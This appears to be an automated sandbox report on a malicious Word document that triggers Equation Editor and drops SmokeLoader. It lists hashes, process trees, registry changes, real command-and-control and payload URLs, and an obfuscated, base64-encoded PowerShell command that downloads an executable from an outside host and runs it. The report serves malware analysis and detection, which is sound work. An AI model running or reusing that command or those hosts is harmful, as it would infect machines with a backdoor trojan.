Analysis
-
max time kernel
123s -
max time network
124s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-04-2021 09:00
Static task
static1
Behavioral task
behavioral1
Sample
2021lk049443.doc
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2021lk049443.doc
Resource
win10v20210408
General
-
Target
2021lk049443.doc
-
Size
1.1MB
-
MD5
67cb98b84a7db5f2f69023b0c5c08309
-
SHA1
9f04a27bb59ac6842ea400c95af131612bfe00f9
-
SHA256
6b2e23e38be7ad27c11af03599f5caaf69dff237e39a5ffb1904db398e613221
-
SHA512
fd6ad0a85ae2cd37e278c5cf702e67508b606108fd2c5854d52e37574088204db47d015251cde5dd75fe60b155440ed0aa8a735fd9b0fc5d423bda58458fb512
Malware Config
Extracted
https://u.teknik.io/28oLW.jpg
Extracted
smokeloader
2018
http://94.140.115.43/1/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 4 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 7 1692 EQNEDT32.EXE 9 1692 EQNEDT32.EXE 11 1692 EQNEDT32.EXE 12 596 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
69577.exeeVDwACBtpW.exepid process 316 69577.exe 1448 eVDwACBtpW.exe -
Loads dropped DLL 3 IoCs
Processes:
EQNEDT32.EXEpowershell.exepid process 1692 EQNEDT32.EXE 596 powershell.exe 596 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
eVDwACBtpW.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum eVDwACBtpW.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 eVDwACBtpW.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1088 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 852 powershell.exe 852 powershell.exe 596 powershell.exe 596 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
eVDwACBtpW.exepid process 1448 eVDwACBtpW.exe 1448 eVDwACBtpW.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 852 powershell.exe Token: SeDebugPrivilege 596 powershell.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
Processes:
69577.exepid process 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe -
Suspicious use of SendNotifyMessage 10 IoCs
Processes:
69577.exepid process 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe 316 69577.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1088 WINWORD.EXE 1088 WINWORD.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WINWORD.EXEEQNEDT32.EXE69577.exepowershell.exepowershell.exedescription pid process target process PID 1088 wrote to memory of 1348 1088 WINWORD.EXE splwow64.exe PID 1088 wrote to memory of 1348 1088 WINWORD.EXE splwow64.exe PID 1088 wrote to memory of 1348 1088 WINWORD.EXE splwow64.exe PID 1088 wrote to memory of 1348 1088 WINWORD.EXE splwow64.exe PID 1692 wrote to memory of 316 1692 EQNEDT32.EXE 69577.exe PID 1692 wrote to memory of 316 1692 EQNEDT32.EXE 69577.exe PID 1692 wrote to memory of 316 1692 EQNEDT32.EXE 69577.exe PID 1692 wrote to memory of 316 1692 EQNEDT32.EXE 69577.exe PID 316 wrote to memory of 852 316 69577.exe powershell.exe PID 316 wrote to memory of 852 316 69577.exe powershell.exe PID 316 wrote to memory of 852 316 69577.exe powershell.exe PID 316 wrote to memory of 852 316 69577.exe powershell.exe PID 852 wrote to memory of 596 852 powershell.exe powershell.exe PID 852 wrote to memory of 596 852 powershell.exe powershell.exe PID 852 wrote to memory of 596 852 powershell.exe powershell.exe PID 852 wrote to memory of 596 852 powershell.exe powershell.exe PID 596 wrote to memory of 1448 596 powershell.exe eVDwACBtpW.exe PID 596 wrote to memory of 1448 596 powershell.exe eVDwACBtpW.exe PID 596 wrote to memory of 1448 596 powershell.exe eVDwACBtpW.exe PID 596 wrote to memory of 1448 596 powershell.exe eVDwACBtpW.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049443.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\69577.exe"C:\Users\Public\69577.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
70c37acc616cbd0d83e7ebfe0b8bc554
SHA134dc0101703083588ba0803cb1d6c62c43c1cc42
SHA256779d30a8664c519ac47911fb2830e0ae82bbcd936ff1da51c78fefc222df7f22
SHA5121a70beb062ab0d284b2bd870bcb37690d8d25c50f39cf6820983370887314c29d57472eb4bd7ce64e975e1ac2d88253bf435eb6c6e8738d48b0bdb510722e125
-
C:\Users\Public\69577.exeMD5
9fbd32c6bb25f6a660696fa9830c5040
SHA11e41347d36792e823a8982b10170d83a0722e3cc
SHA2565de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
SHA5123b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
-
C:\Users\Public\69577.exeMD5
9fbd32c6bb25f6a660696fa9830c5040
SHA11e41347d36792e823a8982b10170d83a0722e3cc
SHA2565de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
SHA5123b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
-
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
\Users\Public\69577.exeMD5
9fbd32c6bb25f6a660696fa9830c5040
SHA11e41347d36792e823a8982b10170d83a0722e3cc
SHA2565de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
SHA5123b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
-
memory/316-66-0x0000000000000000-mapping.dmp
-
memory/596-102-0x0000000006340000-0x0000000006341000-memory.dmpFilesize
4KB
-
memory/596-78-0x0000000000000000-mapping.dmp
-
memory/596-104-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/596-103-0x0000000006400000-0x0000000006401000-memory.dmpFilesize
4KB
-
memory/596-95-0x0000000006370000-0x0000000006371000-memory.dmpFilesize
4KB
-
memory/596-94-0x0000000005830000-0x0000000005831000-memory.dmpFilesize
4KB
-
memory/596-89-0x0000000005770000-0x0000000005771000-memory.dmpFilesize
4KB
-
memory/596-84-0x0000000004A60000-0x0000000004A61000-memory.dmpFilesize
4KB
-
memory/596-85-0x0000000004A62000-0x0000000004A63000-memory.dmpFilesize
4KB
-
memory/852-76-0x0000000002590000-0x0000000002591000-memory.dmpFilesize
4KB
-
memory/852-70-0x0000000000000000-mapping.dmp
-
memory/852-77-0x0000000004750000-0x0000000004751000-memory.dmpFilesize
4KB
-
memory/852-72-0x00000000004D0000-0x00000000004D1000-memory.dmpFilesize
4KB
-
memory/852-75-0x00000000049A0000-0x00000000049A1000-memory.dmpFilesize
4KB
-
memory/852-74-0x0000000004962000-0x0000000004963000-memory.dmpFilesize
4KB
-
memory/852-73-0x0000000004960000-0x0000000004961000-memory.dmpFilesize
4KB
-
memory/1088-59-0x00000000726F1000-0x00000000726F4000-memory.dmpFilesize
12KB
-
memory/1088-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1088-60-0x0000000070171000-0x0000000070173000-memory.dmpFilesize
8KB
-
memory/1088-112-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1264-110-0x0000000002CB0000-0x0000000002CB1000-memory.dmpFilesize
4KB
-
memory/1264-111-0x0000000002C90000-0x0000000002CA5000-memory.dmpFilesize
84KB
-
memory/1348-63-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmpFilesize
8KB
-
memory/1348-62-0x0000000000000000-mapping.dmp
-
memory/1448-107-0x0000000000000000-mapping.dmp
-
memory/1692-64-0x00000000753B1000-0x00000000753B3000-memory.dmpFilesize
8KB